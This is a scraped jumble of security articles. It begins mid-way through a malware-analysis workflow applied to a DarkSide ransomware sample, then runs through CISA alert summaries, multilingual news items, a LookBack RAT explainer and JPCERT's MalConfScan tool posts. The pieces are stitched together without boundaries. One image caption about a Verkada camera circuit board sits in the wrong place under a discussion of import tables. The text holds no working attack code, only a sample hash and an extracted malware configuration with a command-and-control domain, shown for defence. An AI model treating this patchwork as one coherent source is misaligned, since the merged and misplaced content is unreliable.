Collect as much easily-accessible open information as possible. This can come from existing articles, public sandbox reports, or other vendors’ detections.

Check for the presence of high-entropy blocks, import table or syscalls and strings to understand if it likely to be packed or not.

Check if some official (non-malicious) packers were used by using packer detection tools.

2. Behavioral Analysis

Conduct this analysis if it is easy to restore the lab environment after execution.

It may not be necessary if good public sandbox reports are already available.

Keep in mind that, often, behavioral analysis doesn’t show the full picture.

It may not go as expected because of anti-RE techniques involved.

3. Unpacking – Optional

Not necessarily present, some malware developers prefer to only use obfuscation.

For official packers, there are multiple existing unpacking tools and scripts already available.

Ideally, the unpacked sample should remain executable to make the dynamic analysis easy. Otherwise, get as much unpacked code and data as possible.

4. Static and Dynamic Analysis of the Actual Functionality

This step only becomes possible once the unpacking is done (if it was necessary).

Generally, strings and APIs give the maximum information and serve as important landmarks to facilitate navigation within the samples.

Keep the markup accurate: rename functions, create structures, define enums and leave comments where necessary.

Debugging is mainly needed to decrypt/decode/decompress code and data and resolve APIs. Static analysis is generally enough for the rest.

Applying the Workflow to Malware Analysis

Let’s take a look at a DarkSide ransomware sample, which we analyzed earlier this year: 0a0c225f0e5ee941a79f2b7701f1285e4975a2859eb4d025d96d9e366e81abb9

Step 1: Triage

At the time of analysis, the sample had already been uploaded to Virustotal, so all cybersecurity community members could benefit from access and were able to see AV vendors’ detections as well as the sandbox logs in the Behavior tab. Note that there are now multiple sandboxes supported in Virustotal, so try a few to find a good report.

Multiple sandbox options on Virustotal.

Multiple sandbox options on Virustotal.

A quick look at the sample in the hex editor reveals that there is a high-entropy block at the end. There are multiple things it could be: the next stage payload or another module, a blob containing encrypted strings or configuration, etc. Static analysis will be required to understand it.

A high-entropy block

A high-entropy block.

There are pretty much no meaningful strings and APIs:

PCB overview of the Verkada D40 camera.

Very few entries in the import table.

This is a strong indicator that the sample is obfuscated with APIs resolved dynamically and strings encrypted. Running a packer detection tool (PEiD with custom community signatures) confirms that there is no indication that public packers have been used in this case.

PEiD did not identify any known packers

PEiD did not identify any known packers.

Step 2: Behavioral Analysis

By the time the analysis began, the sample had already been submitted to various public sandboxes by other community members, so lots of information could be taken from there.

File activity in the public any.run report

File activity in the public any.run report.

Step 3: Unpacking

Checking cross-references to the high-entropy block in the disassembler, we can see that this doesn’t seem to be the next stage payload as there is no control transfer to it or related blocks. In addition, a quick look around the disassembly confirms that the sample is indeed obfuscated rather than packed with multiple APIs resolved dynamically by hashes and with strings encrypted.

API resolution by hashes

API resolution by hashes.

A call to the not-yet-resolved API

A call to the not-yet-resolved API.

Step 4: Static and Dynamic Analysis of the Actual Functionality

In order to be able to efficiently navigate the disassembly, we need to make APIs and strings easily readable.

For APIs, this is very easy to achieve with dynamic analysis as all the APIs are resolved in a single function. Therefore, letting it execute until the end will give us all the APIs’ addresses. To propagate their names to the pointers, use standard renimp.idc script shipped as part of IDA Pro.

Resolved APIs’ names

Resolved APIs’ names.

This approach won’t work for strings, as they’re decrypted on an ad-hoc basis just before being used, rather than in a single place. Therefore, to make them easily visible, scripting will be required. In our blog on Darkside, we have already provided such a script that will attempt to find all the encrypted strings and decrypt them.

Before string decryption

Before string decryption.

After string decryption.

After string decryption.

That’s it. Now when both strings and APIs are visible, the only thing left to engineer is to carefully go through cross references and keep the markup for the corresponding functions describing all potentially interesting information (subject to the target audience) in the article.

Conclusion

Knowledge sharing is an important part of the cybersecurity field that allows us to quickly adapt to new threats and minimize their associated risks. By properly focusing our efforts, we can improve the quality of this process and make the world a safer place.

icon-lightbulb.png

Extra Tips

Know your audience – the content of the technical blog post (and the corresponding questions to answer) will be very different from a news article for the general public
Consider teamwork to speed up the process – Asking for help if at an early stage helps increase the total time available for the analysis
Have your templates ready – simple scripts to decrypt / decode / decompress the data may help avoid unnecessary delays

Related Content

OT IoT Security 2021 1H Research Report

RESEARCH REPORT
OT/IoT Security Report

What You Need to Know to Fight Ransomware and IoT VulnerabilitiesJuly 2021

RANSOMWARE

Why ransomware is a formidable threat
How Ransomware as a Service works
Analysis of DarkSide, the malware that attacked Colonial Pipeline

VULNERABILITIES

Latest ICS and medical device vulnerability trends

IoT SECURITY CAMERAS

Why P2P security camera architecture threatens confidentiality
How security cameras are vulnerable
Research findings on surveillance cameras

RECOMMENDATIONS

Ten measures to take immediately to defend your systems

Download

Related Links

Blog: BlackMatter Ransomware Technical Analysis and Tools from Nozomi Networks Labs
Blog: Critical Log4shell (Apache Log4j) Zero-Day Attack Analysis
Blog: Colonial Pipeline Ransomware Attack: Revealing How DarkSide Works
Blog: Enhancing Threat Intelligence with the MITRE ATT&CK Framework

The post How to Analyze Malware for Technical Writing appeared first on Nozomi Networks.

flag.png

Original release date: July 7, 2021 | Last revised: July 8, 2021

CISA has published a new [Malware Analysis Report (MAR) on DarkSide Ransomware] and updated Alert AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks, originally released May 11, 2021. This update adds indicators of compromise associated with a DarkSide ransomware variant that executes a dynamic-link library used to delete Volume Shadow copies available on the system.

CISA encourages users and administrators to review the following resources for more information:

AA21-131A: DarkSide Ransomware: Best Practices for Preventing Business Disruption from Ransomware Attacks
Malware Analysis Report MAR-10337801-1.v1

This product is provided subject to this Notification and this Privacy & Use policy.

flag.png

Original release date: April 22, 2021

CISA has released AR21-112A: CISA Identifies SUPERNOVA Malware During Incident Response to provide analysis of a compromise in an organization’s enterprise network by an advance persistent threat actor. This report provides tactics, techniques, and procedures CISA observed during the incident response engagement.

CISA encourages organizations to review AR21-112A for more information.

This product is provided subject to this Notification and this Privacy & Use policy.

AR21-112A

flag.png

Original release date: April 15, 2021

CISA and the Department of Defense (DoD) Cyber National Mission Force (CNMF) have analyzed additional SolarWinds-related malware variants—referred to as SUNSHUTTLE and SOLARFLARE. One of the analyzed files was identified as a China Chopper webshell server-side component that was observed on a network with an active SUNSHUTTLE infection. The webshell can provide a cyber threat actor an alternative method of accessing a network, even if the SUNSHUTTLE infection was remediated.

The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR).

CISA encourages users and administrators to review Malware Analysis Report MAR-10327841-1.v1, U.S. Cyber Command’s VirusTotal page, and the following resources for more information: 

CISA web page: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise
CISA web page: Supply Chain Compromise
CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: March 17, 2021

CISA and the Federal Bureau of Investigation (FBI) have released a Joint Cybersecurity Advisory (CSA) on TrickBot malware. A sophisticated group of cyber criminals are using phishing emails claiming to contain proof of traffic violations to lure victims into downloading TrickBot. TrickBot is a highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities.

To secure against TrickBot, CISA and the FBI recommend users and administrators review AA21-076A: TrickBot Malware as well as CISA’s Fact Sheet: TrickBot Malware for guidance on implementing specific mitigation measures to protect against this activity.

 

This product is provided subject to this Notification and this Privacy & Use policy.

Industrial Control Systems: The New Target of Malware

During 2020, CISA issued 38 cyber alerts ranging from nation-state actors like Iran and North Korea to known ransomware specifically targeting pipeline operations and notably the last alert issued on December 17, 2020, Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, for the SolarWinds supply chain attack.

2020 represents a 660% increase in cyber alerts over 2019, during which CISA issued five cyber warnings over the full year.

Organizations across the board also saw a growing number of adversaries targeting and attacking industrial control systems (ICS) and operational technology (OT) networks. It’s a trend that is clearly continuing into the new year (‘Dangerous Stuff’: Hackers Tried to Poison Water Supply of Florida Town).

And as the attack surface continues to expand for critical infrastructure with owners and operators adopting new technologies to improve operational efficiencies, the increased vulnerabilities and targeting of ICS systems and OT networks is expected to rise.

The post Industrial Control Systems: The New Target of Malware appeared first on Security Boulevard.

A vulnerability, which was classified as problematic, was found in Malwarebytes up to 3.x on macOS (Anti-Malware Software). Affected is the function posix_spawn of the component Launch Daemon. Upgrading to version 4.0 eliminates this vulnerability.

Es wurde eine Schwachstelle in Malwarebytes bis 3.x auf macOS (Anti-Malware Software) gefunden. Sie wurde als problematisch eingestuft. Betroffen hiervon ist die Funktion posix_spawn der Komponente Launch Daemon. Ein Upgrade auf die Version 4.0 vermag dieses Problem zu beheben.

Una vulnerabilità di livello problematico è stata rilevata in Malwarebytes fino 3.x su macOS (Anti-Malware Software). Riguarda la funzione posix_spawn del componente Launch Daemon. L’aggiornamento alla versione 4.0 elimina questa vulnerabilità.

An anonymous reader quotes a report from ZDNet: For more than five years, macOS users have been the targets of a sneaky malware operation that used a clever trick to avoid detection and hijacked the hardware resources of infected users to mine cryptocurrency behind their backs.

SDfb.jpg

An issue was discovered in Malwarebytes before 4.0 on macOS. A malicious application was able to perform a privileged action within the Malwarebytes launch daemon. The privileged service improperly…

Read the original article: Expert launched Malvuln, a project to report flaws in malware The researcher John Page launched malvuln.com, the first website exclusively dedicated to the research of security flaws in malware codes. The security expert John Page (aka hyp3rlinx) launched malvuln.

Publication date: 11/20/2020

Two Romanian citizens have been arrested for allegedly running the malware encryption services, CyberSeal and Dataprotector, to avoid detection of antivirus software, and the Cyberscan service to test malware against antiviruses.

These services have been offered in the underground market since 2010 for a value of no more than $300 per license, with regular updates and customer support. They have also been used by more than 1.560 cybercriminals with different types of malware.

The police operation, coordinated by the European Cybercrime Centre (EC3), resulted in several house searches in Bucharest and Craiova, and the neutralisation of their backend infrastructure in Romania, Norway and the USA.

11/20/2020

Tags:
Cybercrime, Encryption, Incident, Internet, Malware, Other critical infrastructures

References:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

twitterbitacora.png

Fecha de publicación: 20/11/2020

Dos ciudadanos rumanos han sido arrestados por, presuntamente, administrar los servicios de cifrado de malware, CyberSeal y Dataprotector, para eludir la detección de software antivirus, y el servicio Cyberscan para testear malware frente a antivirus.

Estos servicios han sido ofrecidos en el mercado clandestino desde el 2010 por un valor no superior a los 300 dólares por licencia, contando además con actualizaciones periódicas y soporte para el cliente. Asimismo, han sido utilizados por más de 1.560 ciberdelincuentes con diferentes tipos de malware.

La operación policial, coordinada por el Centro Europeo de Ciberdelincuencia (EC3), resultó en varios registros domiciliarios en Bucarest y Craiova, y en la neutralización de su infraestructura backend en Rumania, Noruega y EEUU.

20/11/2020

Etiquetas:
Cibercrimen, Cifrado, Incidente, Internet, Malware, Otras infraestructuras críticas

Referencias:

ReferenciaMedioURLFechaExternoIdioma destinoIdioma contenido Romanian duo arrested for running malware encryption service to bypass antivirus softwareeuropol.europa.euhttps://www.europol.europa.eu/newsroom/news/romanian-duo-arrested-for-running-malware-encryption-service-to-bypass-antivirus-software20/11/2020sienen Romanians arrested for running underground malware servicessecurityaffairs.cohttps://securityaffairs.co/wordpress/111270/cyber-crime/police-shutdown-malware-services.html22/11/2020sienen Arrestan a dos ciudadanos Rumanos por ejecutar servicios de malwareseguridadyfirewall.clhttps://www.seguridadyfirewall.cl/2020/11/la-policia-rumana-arresto-dos.html23/11/2020sieses

Since 2016, the NJCCIC has gathered cyber threat intelligence information to develop specific threat profiles on Android malware, ATM malware, botnets, cryptocurrency-mining malware, exploit kits, industrial control systems (ICS) malware, iOS malware, macOS malware, point-of-sale malware, ransomware, and trojans.

 

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about how threat actors are bundling Windscribe VPN installers with backdoors. Also, read about a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications.

 

 

Read on:

 

Windows Backdoor Masquerading as VPN App Installer

This article discusses findings covered in a recent blog from Trend Micro where company researchers warn that Windows users looking to install a VPN app are in danger of downloading one that’s been bundled with a backdoor. The trojanized package in this specific case is the Windows installer for Windscribe VPN and contains the Bladabindi backdoor.

The Evolution of Malicious Shell Scripts

The Unix-programming community commonly uses shell scripts as a simple way to execute multiple Linux commands within a single file. Many users do this as part of a regular operational workload manipulating files, executing programs and printing text. However, as a shell interpreter is available in every Unix machine, it is also an interesting and dynamic tool abused by malicious actors.

Microsoft Says It Detected Active Attacks Leveraging Zerologon Vulnerability

Hackers are actively exploiting the Zerologon vulnerability in real-world attacks, Microsoft’s security intelligence team said on Thursday morning. The attacks were expected to happen, according to security industry experts. Multiple versions of weaponized proof-of-concept exploit code have been published online in freely downloadable form since details about the Zerologon vulnerability were revealed on September 14 by Dutch security firm Secura BV.

Stretched and Stressed: Best Practices for Protecting Security Workers’ Mental Health

Security work is stressful under the best of circumstances, but remote work presents its own challenges. In this article, learn how savvy security leaders can best support their teams today — wherever they’re working. Trend Micro’s senior director of HR for the Americas, Bob Kedrosky, weighs in on how Trend Micro is supporting its remote workers.

Exploitable Flaws Found in Facial Recognition Devices

To gain a more nuanced understanding of the security issues present in facial recognition devices, Trend Micro analyzed the security of four different models: ZKTeco FaceDepot-7B, Hikvision DS-K1T606MF, Telpo TPS980 and Megvii Koala. Trend Micro’s case studies show how these devices can be misused by malicious attackers.

New ‘Alien’ Malware Can Steal Passwords from 226 Android Apps

Security researchers have discovered and analyzed a new strain of Android malware that comes with a wide array of features allowing it to steal credentials from 226 applications. Named Alien, this new trojan has been active since the start of the year and has been offered as a Malware-as-a-Service (MaaS) offering on underground hacking forums.

Government Software Provider Tyler Technologies Hit by Possible Ransomware Attack

Tyler Technologies, a Texas-based provider of software and services for the U.S. government, started informing customers this week of a security incident that is believed to have involved a piece of ransomware. Tyler’s website is currently unavailable and in emails sent out to customers the company said its internal phone and IT systems were accessed without authorization by an “unknown third party.”

U.S. Justice Department Charges APT41 Hackers Over Global Cyberattacks

On September 16, 2020, the United States Justice Department announced that it was charging five Chinese citizens with hacking crimes committed against over 100 institutions in the United States and abroad. The global hacking campaign went after a diverse range of targets, from video game companies and telecommunications enterprises to universities and non-profit organizations. The five individuals were reportedly connected to the hacking group known as APT41.

Phishers are Targeting Employees with Fake GDPR Compliance Reminders

Phishers are using a bogus GDPR compliance reminder to trick recipients – employees of businesses across several industry verticals – into handing over their email login credentials. In this evolving campaign, the attackers targeted mostly email addresses they could glean from company websites and, to a lesser extent, emails of people who are high in the organization’s hierarchy.

Mispadu Banking Trojan Resurfaces

Recent spam campaigns leading to the URSA/Mispadu banking trojan have been uncovered, as reported by malware analyst Pedro Tavares in a Twitter post and by Seguranca Informatica in a blog post. Mispadu malware steals credentials from users’ systems. This attack targets systems with Spanish and Portuguese as system languages.

A Blind Spot in ICS Security: The Protocol Gateway Part 3: What ICS Security Administrators Can Do

In this blog series, Trend Micro analyzes the impacts of the serious vulnerabilities detected in the protocol gateways that are essential when shifting to smart factories and discusses the security countermeasures that security administrators in those factories must take. In the final part of this series, Trend Micro describes a stealth attack method that abuses a vulnerability as well as informs readers of a vital point of security measures required for the future ICS environment.

Major Instagram App Bug Could’ve Given Hackers Remote Access to Your Phone

Check Point researchers disclosed details about a critical vulnerability in Instagram’s Android app that could have allowed remote attackers to take control over a targeted device just by sending victims a specially crafted image. The flaw lets attackers perform actions on behalf of the user within the Instagram app, including spying on victim’s private messages and deleting or posting photos from their accounts, as well as execute arbitrary code on the device.

Addressing Threats Like Ryuk via Trend Micro XDR

Ryuk has recently been one of the most noteworthy ransomware families and is perhaps the best representation of the new paradigm in ransomware attacks where malicious actors go for quality over sheer quantity. In 2019, the Trend Micro™ Managed XDR and Incident Response teams investigated an incident concerning a Trend Micro customer that was infected with the Ryuk ransomware.

What are your thoughts on the Android Instagram app bug that could allow remote access to user’s phones? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybercriminals Distribute Backdoor with VPN Installer and New ‘Alien’ Malware can Steal Passwords from 226 Android Apps appeared first on .

fed-up-person-laptop.jpg

Using knowledge from the ‘cyber frontline’ to improve our ‘Mitigating malware and ransomware’ guidance.

Una severa vulnerabilidad existe en casi todas las versiones firmadas de GRUB2, el cual es usado por la mayoría de los sistemas Linux. De explotarse adecuadamente, permitiría a los atacantes comprometer el proceso de arranque del sistema, incluso si el mecanismo de verificación «Secure Boot» está activo.

La falla fue reportada por Eclypsium el 29 de julio aunque el CVE-2020-10713 asociado tiene fecha del 20 de marzo, y si bien grub2 podría relacionarse más directamente con sistemas Linux, los equipos con arranque dual (o múltiple) abre la puerta a la explotación hacia otros sistemas como Windows.

Se encontró una falla en las versiones previas a 2.06 de grub2. Un atacante puede usar la falla en GRUB 2 para secuestrar y manipular el proceso de verificación de GRUB. Esta falla también permite eludir las protecciones de arranque seguro (Secure Boot). Para poder cargar un kernel no confiable o modificado, un atacante primero necesitaría disponer de acceso al sistema, como obtener acceso físico, tener la posibilidad de alterar una red «pxe-boot» o tener acceso remoto a un sistema en la red con acceso de root. Con este acceso, un atacante podría forjar una cadena para causar un desbordamiento del búfer inyectando una carga maliciosa, que conduzca a la ejecución de código arbitrario dentro de GRUB. La mayor amenaza de esta vulnerabilidad es la confidencialidad e integridad de los datos, así como la disponibilidad del sistema.

https://cve.mitre.org/cgi-bin//cvename.cgi?name=CVE-2020-10713

Según el reporte de BleepingComputer, ha compartido la vulnerabilidad con los proveedores de sistemas operativos, los fabricantes de computadoras y los CERT/CSIRT. Se espera que hoy mismo se publiquen avisos y mitigaciones posibles de múltiples organizaciones en la industria.

Vemos el problema con baja probabilidad de ocurrencia o al menos con alta dificultad, pues como se indica en la cita del CVE, requiere condiciones especiales para llegar a explotar la vulnerabilidad. Esto no significa que nos podamos despreocupar, más bien debemos estar muy pendientes de las actualizaciones que irán llegando de los diferentes fabricantes.

Here’s what’s changed in the NCSC’s guidance on mitigating malware and ransomware.

On August 1, security researchers at Proofpoint reported the details of a spearphishing campaign targeting three different United States utility companies using a malware called “LookBack.” The spearphishing emails, sent between July 19 and July 25, contained a malicious Microsoft Word attachment that installed a Remote Access Trojan (RAT) capable of performing activities like deleting files, taking screenshots, rebooting machines, and then deleting itself from an infected network.

While Prooftpoint was able to confirm the presence of LookBack malware at three companies, it is likely that the malware has infected other organizations as well. The emails used in the spearphishing campaign falsely appeared to be from the National Council of Examiners for Engineering and Surveying (NCEES), an American nonprofit organization that handles professional licensing for engineers and surveyors. Even fraudulently using the NCEES logo, the emails included Word documents embedded with malicious micros that, once opened, installed and ran the never-before-seen RAT.

Researchers told Threatpost that the emails were blocked before they could infect the unnamed utility companies.

How LookBack Works

According to the report by Proofpoint, LookBack is a RAT that relies on a proxy communication tool to relay data from the infected host to a command-and-control server (C2). The malware can view process, system and file data; delete files; take screenshots; move and click the infected system’s mouse; reboot machines; and delete itself from an infected host.

Researchers said that the LookBack spearphishing campaign used tactics once used by known APT adversaries targeting Japanese corporations in 2018 – which highlights the rapidly evolving nature of malware and its use by nation-state actors.

The Microsoft Word document attached to the phishing emails contains a VBA macro that drops three different Privacy Enhanced Mail (PEM) files when executed. Certutil.exe is then dropped to decode PEM files, which are later restored to their true extensions using essentuti.exe. The files then impersonate the name of an open-source binary used by common tools like Notepad++, which contains the C2 configuration. Finally, the macro runs GUP.exe and libcurl.dll to execute the LookBack malware. Once executed, LookBack can send and receive numerous commands, such as Find files, Read files, Delete files, Write to files, Start services, and more.

Has Your Organization Been Exposed to LookBack? Here’s How to Detect It.

Due to the nature of the threat, it’s important to have multiple controls in place to detect the activities related. This includes continuous security awareness training for employees and personnel to help them better identify fake and malicious emails. But beyond SPAM filters and firewalls, Nozomi Networks Labs recommends the use of both anomaly detection technologies to identify unusual behavior, and the use of traditional threat detection capabilities to provide additional context around suspicious actors related to known threats.

Within 24 hours of the announcement of this attack, the Nozomi Networks Labs team added new rules and signatures to the OT ThreatFeed to help detect LookBack in your environment. This means that alerts will now be triggered for suspicious activity related to the known threat, LookBack, so that you can detect and remediate quickly. For customers using OT ThreatFeed, please make sure that your systems are running the latest version (from August 2, 2019) to enable these new rules.

With cyberthreats against utilities continuing to rise, LookBack is just another reminder that there’s still much work to be done as utility companies continue to strengthen their cyber security.

REGISTER FOR THE WEBINAR
How to Detect LookBack Malware

Tuesday, August 16th, 2019
9:00 AM PDT

REGISTER NOW

Related Links

Proofpoint Blog: LookBack Malware Targets the United States Utilities Sector with Phishing Attacks
SecurityWeek Article: New LookBack Malware Used in Attacks Against U.S. Utilities Sector
Threatpost Article: Nation-State APTs Target U.S. Utilities With Dangerous Malware
Blog: IEC 62351 Standards for Securing Power System Communications
Blog: Advancing IEC Standards for Power Grid Cyber Security
Webpage: Real-time Visibility and Cyber Security for Electric Utilities
Webpage: Mitigating ICS Cyber Incidents
Webpage: Nozomi Network Labs
Webpage: OT ThreatFeed

The post What You Need to Know About LookBack Malware & How to Detect It appeared first on Nozomi Networks.

In malware analysis, extracting the configuration is an important step. Malware configuration contains various types of information which provides a lot of clues in incident handling, for example communication details with other hosts and techniques to perpetuates itself. This time, we will introduce a plugin “MalConfScan with Cuckoo” that automatically extracts malware configuration using MalConfScan (See the previous article) and Cuckoo Sandbox (hereafter “Cuckoo”).
This plugin is available on GitHub. Feel free to download from the webpage below:

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo

About MalConfScan with Cuckoo

“MalConfScan with Cuckoo” is a plugin for Cuckoo, which is an open source sandbox system for dynamic malware analysis. By adding this plugin to Cuckoo, MalConfScan runs on Cuckoo, enabling automatic extraction of malware configuration . Figure 1 shows Cuckoo’s behaviour where “MalConfScan with Cuckoo” is installed.

Figure 1:Behaviour of MalConfScan with CuckooFigure 1:Behaviour of “MalConfScan with Cuckoo”

“MalConfScan with Cuckoo” runs malware on the host machine to extract configuration. When malware is registered on Cuckoo and executed on the host machine, a memory image will be dumped, from which MalConfScan extracts configuration of known malware. Extracted configuration will then be shown in a report. Please see the previous article or the following page for the list of malware that this tool supports.

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan/

Instruction and report example

First, upload malware on Cuckoo that has “MalConfScan with Cuckoo” installed by using Web GUI or commands. An official document from Cuckoo [1] provides details about the upload procedures. When the upload and analysis is completed, a report will be provided as in Figure 2.

Figure 2:Report of MalConfScan with CuckooFigure 2:Report of “MalConfScan with Cuckoo”

Figure 2 shows the configuration of malware Himawari, a variant of RedLeaves which is used in targeted attacks. It is a kind of bot, and the configuration contains C&C server, destination port, protocol, encryption key etc. In this way, “MalConfScan with Cuckoo” can easily extract configuration for known malware.
Additionally, the results can also be obtained in JSON format. report.json records the following data:

“malconfscan”: {
“data”: [
{
“malconf”: [
[
{“Server1”: “diamond.ninth.biz”},
{“Server2”: “diamond.ninth.biz”},
{“Server3”: “diamond.ninth.biz”},
{“Server4”: “diamond.ninth.biz”},
{“Port”: “443”},
{“Mode”: “TCP and HTTP”},
{“ID”: “2017-11-28-MACRO”},
{“Mutex”: “Q34894iq”},
{“Key”: “usotsuki”},
{“UserAgent”: “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)”},
{“Proxy server”: “”},
{“Proxy username”: “”},
{“Proxy password”: “”}
] ],
“vad_base_addr”: “0x04521984”,
“process_name”: “iexplore.exe”,
“process_id”: “2248”,
“malware_name”: “Himawari”,
“size”: “0x00815104”
}
],
},

How to install

The following steps are required before installing “MalConfScan with Cuckoo”:

Install MalConfScan
Apply patches for Cuckoo
Change configuration of Cuckoo

For more information about how to install the tool, please see our wiki on the GitHub:

   MalConfScan-with-Cuckoo Wiki – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo/wiki

Ubuntu 18.04
Python 2.7.16
Cuckoo 2.0.6
Volatility 2.6

A blog article by @soji256 explains procedures to install “MalConfScan with Cuckoo”, which can be a good reference.

   Installing the MalConfScan with Cuckoo to Analyze Emotet – Medium
   https://medium.com/@soji256/build-a-malconfscan-with-cuckoo-environment-to-analyze-emotet-ff0c4c589afe

In closing

This plugin enables extracting configuration of known malware from sandbox. Even in case where malware has anti-VM or anti-sandbox function, we can still extract the configuration by spoofing some environmental information.
We will present the details of “MalConfScan” and “MalConfScan with Cuckoo” at the coming Black Hat USA 2019 Arsenal [3]. Feel free to stop by if you are attending Blackhat USA 2019, and we look forward to having active discussion and feedback from analysts.

Tomoaki Tani(Translated by Yukako Uchida)

[1] Cuckoo Docs – Submit an Analysis https://cuckoo.sh/docs/usage/submit.html

[2] “Abnormal Encryption of Himawari” – Japan Security Analyst Conference [Japanese] https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf

[3] MalConfScan with Cuckoo: Automatic Malware Configuration Data Extraction and Memory Forensic – Black Hat USA 2019 https://www.blackhat.com/us-19/arsenal/schedule/index.html#malconfscan-with-cuckoo-automatic-malware-configuration-data-extraction-and-memory-forensic-16914

Every day, new types of malware are discovered. However, many of them are actually variants of existing malware – they share most part of the code and there is a slight difference in configuration such as C&C servers. This indicates that malware analysis is almost complete as long as the configuration is extracted from malware.
In this article, we would like to introduce details of “MalConfScan”, a tool to extract malware configuration, developed by JPCERT/CC. This tool is available on GitHub. Feel free to download from the webpage below:

JPCERTCC/MalConfScan – GitHub https://github.com/JPCERTCC/MalConfScan

Read the Wiki to learn how to install the tool:
MalConfScan wiki – GitHub https://github.com/JPCERTCC/MalConfScan/wiki

About MalConfScan

MalConfScan is a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensic tool. In most cases, malware analysis begins with unpacking the malware to extract configuration. MalConfScan extracts configuration from unpacked executable files loaded on the memory.
MalConfScan can perform the following functions:

malconfscan: Extract configuration of known malware from a memory image
malstrscan: Detect suspicious processes from a memory image and list the string that it refers to
malconfscan

Figure 1 is an example of malconfscan execution. First, a malware-injected process name (Name), the process ID (PID) and the name of the detected malware (Malware Name) are displayed. Malware configuration (Config info) is also displayed.

malconfscan execution result 1Figure 1:malconfscan execution result (Detected “Lavender”, a RedLeaves variant)

malconfscan also decodes encoded strings and displays DGA domains. Figure 2 is the result where malconfscan detected Bebloh. DGA domains are listed following the configuration.

malconfscan execution result 2Figure 2:malconfscan execution result (Detected Bebloh)

As of 30 July 2019, malconfscan is compatible with 25 types of malware. See Appendix for supported malware.

malstrscan

malstrscan detects Process Hollowing on the memory and lists the strings that the process refers to. Although malware configuration is usually encoded, malware decodes it when referring to the information, and this is sometimes left on the memory. This function can pick up such remaining configuration. Figure 3 is an example of malstrscan execution.

malstrscan execution resultsFigure 3:malstrscan execution results

malstrscan lists strings only from the memory space where the PE file is loaded. With ‘-a’ option, it can also list strings in heap and parent memory space.

In closing

malconfscan can be used for malware analysis and memory forensics. We hope that this tool helps incident investigation. We plan to update this tool in the future to make it compatible with many other types of malware.
In the next article, we will install this tool in Cuckoo Sandbox to automatically extract malware configuration.

Shusei Tomonaga
(Translated by Yukako Uchida)

Appendix A Malware Compatible with MalConfScan

Table 1: Compatible malware
Malware
Ursnif
HawkEye Keylogger
Emotet
Lokibot
Smoke Loader
Bebloh
Poison Ivy
AZORult
CobaltStrike
NanoCore RAT
NetWire
AgentTesla
PlugX
FormBook
RedLeaves
NodeRAT
TSCookie
njRAT
TSC_Loader
TrickBot
xxmm
Remcos
Datper
QuasarRAT
Ramnit

Listen over de identificerede malware-varianter i juni måned viser en tilbagevenden af WannaCry- og Tinba-aktiviteter.

Tendensen er stadig at de ti varianter, der identificeres oftest, står for mere end 60 procent af de samlede malware-identifikationer.

Fordelingen over de hyppigst optrædende malware-navne ser således ud for juni 2019:

Sprog
Dansk

Keywords: malwareLæs mere om Top-10 over malware i juni

I ricercatori di sicurezza del team Unit 42 di Palo Alto Networks hanno scoperto il malware per macOS CookieMiner, progettato per “rubare” i cookie associati a siti Web per lo scambio di criptovalute.

There are two types of companies: Those who have been hacked, and those who don’t yet know they have been hacked1

With data breaches frequently making the news and causing panic among network administrators, the above statement by former Cisco boss John Chambers in 2015 certainly doesn’t seem far-fetched. I don’t remember a week in 2018 going by where I wasn’t learning of a data breach and how sophisticated the attack was. Well, except for the time I didn’t have internet access while visiting the Salt Cathedral of Zipaquirá, and I couldn’t understand why. Then, there was the time I had no access on a cruise, but I digress.

The consequences of a data breach are far reaching and include the tangible and intangible. It should come as no surprise that information security is the top concern for CISOs and CIOs of companies. Some of these companies are embracing cloud-native initiatives that have improved organizational agility, reduced products’ time-to-market, and leveled the playing field with respect to computational power. However, they lose visibility into the expanded environment, causing concerns over whether they can adequately secure their cloud environment the way they would their traditional network.

These well-founded concerns are understandable. Traditional network security solutions being used in combating the current cyber-crimewave have only increased the complexity and risk for businesses. Fraudsters have amped up their phishing techniques to deploy sophisticated malware on network devices(human controlled and otherwise) as part of ransomware campaigns, steal sensitive data, or other criminal activities.

It’s far more important to keep an eye on what’s traveling out of the network….Today, malicious actors aren’t interested in scaling the castle wall and capturing the flag. They want to exfiltrate the flag.2

